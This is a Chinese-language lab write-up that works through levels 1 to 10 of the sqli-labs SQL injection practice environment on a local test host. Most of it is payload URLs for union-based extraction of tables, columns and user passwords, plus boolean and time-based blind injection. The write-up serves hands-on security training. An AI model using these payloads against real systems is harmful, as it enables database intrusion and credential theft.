**
sql-labs详细全解
**
第一关:
常见的string注入:
http://192.168.80.139/sqli-labs-master/Less-1/?id=1
构造url:
1.http://192.168.80.139/sqli-labs-master/Less-1/?id=1’ 报错
2.http://192.168.80.139/sqli-labs-master/Less-1/?id=1’ and 1=1-- - 返回正常
3. http://192.168.80.139/sqli-labs-master/Less-1/?id=1’ and 1=2-- - 返回错误
4.http://192.168.80.139/sqli-labs-master/Less-1/?id=1’ order by 3-- -得出查询的字段数为3
4.http://192.168.80.139/sqli-labs-master/Less-1/?id=a’ union select 1,2,3-- -查询显示的是哪个字段
5.http://192.168.80.139/sqli-labs-master/Less-1/?id=a’ union select 1,database(),user()-- -查看当前使用的数据库以及用户
6.http://192.168.80.139/sqli-labs-master/Less-1/?id=a’ union select 1,group_concat(table_name),user() from information_schema.tables where table_schema=0x7365637572697479-- -获取当前数据库中的表
7.http://192.168.80.139/sqli-labs-master/Less-1/?id=a’ union select 1,group_concat(column_name),user() from information_schema.columns where table_name=0x7573657273-- -获取users表中的字段
8.http://192.168.80.139/sqli-labs-master/Less-1/?id=a’ union select 1,group_concat(username),group_concat(password) from users-- -拿到账户密码
至此,一个完整sql注入完成。
由于篇幅问题后面的就不给出截图了,大概都与第一关的类似
第二关:
常见的int型注入:
1.http://192.168.80.139/sqli-labs-master/Less-2/?id=1 and 1=1
2.http://192.168.80.139/sqli-labs-master/Less-2/?id=1 order by 3
3.http://192.168.80.139/sqli-labs-master/Less-2/?id=100 union select 1,2,3
4.http://192.168.80.139/sqli-labs-master/Less-2/?id=100 union select 1,database(),user()
5.http://192.168.80.139/sqli-labs-master/Less-2/?id=100 union select 1,group_concat(table_name),user() from information_schema.tables where table_schema=0x7365637572697479
6.http://192.168.80.139/sqli-labs-master/Less-2/?id=100 union select 1,group_concat(column_name),user() from information_schema.columns where table_name=0x7573657273
7.http://192.168.80.139/sqli-labs-master/Less-2/?id=100 union select 1,group_concat(username),group_concat(password) from users
第三关:
由于写的篇幅实在是些长,就给出绕过的payload,后面的过程都是一样的。
payload:
http://192.168.80.139/sqli-labs-master/Less-3/?id=1’) and 1=1 – -
第四关;
payload:
http://192.168.80.139/sqli-labs-master/Less-4/?id=4") and 1=1-- -
第五关:
这一关是基于布尔的盲注,根据返回的页面判断查询的内容存不存在。
查询内容存在:
不存在:
因为页面没有显示,只能一个一个的猜解,首先判断数据库。
http://192.168.80.139/sqli-labs-master/Less-5/?id=1’ and mid(database(),1,1)>‘s’ – -
猜解出数据库为security
猜测表:http://192.168.80.139/sqli-labs-master/Less-5/?id=1’ and mid((select group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479),1,1)>‘a’ – -
得出表users,猜测字段:
http://192.168.80.139/sqli-labs-master/Less-5/?id=1’ and mid((select group_concat(column_name) from information_schema.columns where table_name=0x7573657273),1,1)>‘a’ – -
得到重要字段:username,password
猜解username的内容:
http://192.168.80.139/sqli-labs-master/Less-5/?id=1’ and mid((select group_concat(username) from users),1,1)>‘a’ – -
猜解password的内容:
http://192.168.80.139/sqli-labs-master/Less-5/?id=1’ and mid((select group_concat(password) from users),1,1)>‘s’ – -
至此盲注完成。
第六关:
基于布尔的盲注:
与第五关类似:
payload为:http://192.168.80.139/sqli-labs-master/Less-6/?id=1" and mid(database(),1,1)>‘a’ – -
第七关:
基于报错的盲注:
payload:http://192.168.80.139/sqli-labs-master/Less-7/?id=1’)) and mid(database(),1,1)>‘s’ – -
第八关:
基于布尔的盲注:
payload:http://192.168.80.139/sqli-labs-master/Less-8/?id=1’ and mid(database(),1,1) >‘s’-- -
第九关:
基于时间的盲注:
获取数据库:http://192.168.80.139/sqli-labs-master/Less-9/?id=1’ and if((mid(database(),1,1)>‘s’),0,sleep(2)) – -
获取数据库中的表:
http://192.168.80.139/sqli-labs-master/Less-9/?id=1’ and if((mid((select group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479),1,1)>‘z’),0,sleep(2)) – -
获取字段:
http://192.168.80.139/sqli-labs-master/Less-9/?id=1’ and if((mid((select group_concat(column_name) from information_schema.columns where table_name=0x7573657273),1,1)>‘z’),0,sleep(2)) – -
得到字段username,password
获取username:
http://192.168.80.139/sqli-labs-master/Less-9/?id=1’ and if((mid((select group_concat(username) from users),1,1)>‘z’),0,sleep(2)) – -
获取password:
http://192.168.80.139/sqli-labs-master/Less-9/?id=1’ and if((mid((select group_concat(password) from users),1,1)>‘z’),0,sleep(2)) – -
至此基于时间的盲注结束
第十关:
基于时间的盲注,与第九关类似;
payload:http://192.168.80.139/sqli-labs-master/Less-10/?id=1" and if(mid(database(),1,1)>‘z’,0,sleep(2)) – -
先写到这里吧,剩下的改天再来。